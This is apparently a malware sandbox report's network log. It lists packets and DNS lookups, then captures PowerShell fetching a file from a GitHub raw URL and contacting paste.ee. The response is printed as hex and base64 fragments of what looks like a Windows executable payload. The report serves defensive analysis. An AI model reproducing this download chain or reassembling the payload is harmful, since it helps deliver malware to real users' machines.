                                                    Oct 4, 2024 11:25:22.978682041 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.978725910 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.978734970 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.978792906 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065350056 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065408945 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065438032 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065459967 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065471888 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065493107 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065680027 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065701008 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065730095 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065736055 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065764904 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065783978 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.066488028 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.066513062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.066541910 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.066549063 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.066571951 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.066591024 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.066984892 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067003965 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067037106 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.067042112 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067070961 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.067087889 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.067609072 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067630053 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067666054 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.067672968 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067694902 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.067711115 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.068304062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.068324089 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.068356991 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.068362951 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.068388939 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.068403006 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.069081068 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.069112062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.069155931 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.069161892 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.069194078 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.069462061 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.069484949 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.069518089 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.069525957 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.069540024 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.069560051 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.156240940 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.156270027 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.156338930 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.156373024 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.156388044 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.156411886 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.156692982 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.156716108 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.156754017 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.156763077 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.156776905 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.156797886 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.157490015 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.157510042 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.157560110 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.157568932 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.157593012 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.157612085 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.158063889 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.158080101 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.158123016 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.158132076 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.158164024 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.158184052 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.158659935 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.158677101 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.158721924 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.158730030 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.158756018 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.158782005 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.159502983 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.159523964 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.159564018 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.159570932 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.159584999 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.159600973 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.159609079 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.159645081 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.159651995 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.159672976 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.159696102 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.159729004 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.162113905 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.262881994 CEST49709443192.168.2.8188.114.96.3
                                                    Oct 4, 2024 11:25:23.262927055 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.262985945 CEST49709443192.168.2.8188.114.96.3
                                                    Oct 4, 2024 11:25:23.263442039 CEST49709443192.168.2.8188.114.96.3
                                                    Oct 4, 2024 11:25:23.263457060 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.730288029 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.730367899 CEST49709443192.168.2.8188.114.96.3
                                                    Oct 4, 2024 11:25:23.732794046 CEST49709443192.168.2.8188.114.96.3
                                                    Oct 4, 2024 11:25:23.732801914 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.733099937 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.734302044 CEST49709443192.168.2.8188.114.96.3
                                                    Oct 4, 2024 11:25:23.775403023 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.864284039 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.864335060 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.864362001 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.864387035 CEST49709443192.168.2.8188.114.96.3
                                                    Oct 4, 2024 11:25:23.864401102 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.864459038 CEST49709443192.168.2.8188.114.96.3
                                                    Oct 4, 2024 11:25:23.864490986 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.864578962 CEST44349709188.114.96.3192.168.2.8
                                                    Oct 4, 2024 11:25:23.864665985 CEST49709443192.168.2.8188.114.96.3
                                                    Oct 4, 2024 11:25:23.865303993 CEST49709443192.168.2.8188.114.96.3

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 4, 2024 11:25:20.329804897 CEST5075153192.168.2.81.1.1.1
                                                    Oct 4, 2024 11:25:20.339495897 CEST53507511.1.1.1192.168.2.8
                                                    Oct 4, 2024 11:25:23.254899979 CEST5827453192.168.2.81.1.1.1
                                                    Oct 4, 2024 11:25:23.262398005 CEST53582741.1.1.1192.168.2.8

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 4, 2024 11:25:20.329804897 CEST192.168.2.81.1.1.10x25cbStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                    Oct 4, 2024 11:25:23.254899979 CEST192.168.2.81.1.1.10xb8c0Standard query (0)paste.eeA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 4, 2024 11:25:20.339495897 CEST1.1.1.1192.168.2.80x25cbNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                    Oct 4, 2024 11:25:20.339495897 CEST1.1.1.1192.168.2.80x25cbNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                    Oct 4, 2024 11:25:20.339495897 CEST1.1.1.1192.168.2.80x25cbNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                    Oct 4, 2024 11:25:20.339495897 CEST1.1.1.1192.168.2.80x25cbNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                    Oct 4, 2024 11:25:23.262398005 CEST1.1.1.1192.168.2.80xb8c0No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                    Oct 4, 2024 11:25:23.262398005 CEST1.1.1.1192.168.2.80xb8c0No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • raw.githubusercontent.com
                                                    • paste.ee

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.849707185.199.108.1334434844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-04 09:25:20 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                    Host: raw.githubusercontent.com
                                                    Connection: Keep-Alive
                                                    2024-10-04 09:25:20 UTC901INHTTP/1.1 200 OK
                                                    Connection: close
                                                    Content-Length: 2935468
                                                    Cache-Control: max-age=300
                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                    Content-Type: text/plain; charset=utf-8
                                                    ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                    Strict-Transport-Security: max-age=31536000
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: deny
                                                    X-XSS-Protection: 1; mode=block
                                                    X-GitHub-Request-Id: DDDE:3E1F9D:6A875A:733786:66FFB31C
                                                    Accept-Ranges: bytes
                                                    Date: Fri, 04 Oct 2024 09:25:20 GMT
                                                    Via: 1.1 varnish
                                                    X-Served-By: cache-ewr-kewr1740060-EWR
                                                    X-Cache: HIT
                                                    X-Cache-Hits: 0
                                                    X-Timer: S1728033921.910232,VS0,VE8
                                                    Vary: Authorization,Accept-Encoding,Origin
                                                    Access-Control-Allow-Origin: *
                                                    Cross-Origin-Resource-Policy: cross-origin
                                                    X-Fastly-Request-ID: 90164266a26d328bfd5cf00286eeab706ea78bfe
                                                    Expires: Fri, 04 Oct 2024 09:30:20 GMT
                                                    Source-Age: 0
                                                    2024-10-04 09:25:20 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                    Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                    2024-10-04 09:25:20 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                    Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                    2024-10-04 09:25:20 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                    Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                    2024-10-04 09:25:20 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                    Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                    2024-10-04 09:25:20 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                    Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                    2024-10-04 09:25:20 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                    Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                    2024-10-04 09:25:20 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                    Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                    2024-10-04 09:25:20 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                    Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                    2024-10-04 09:25:20 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                    Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
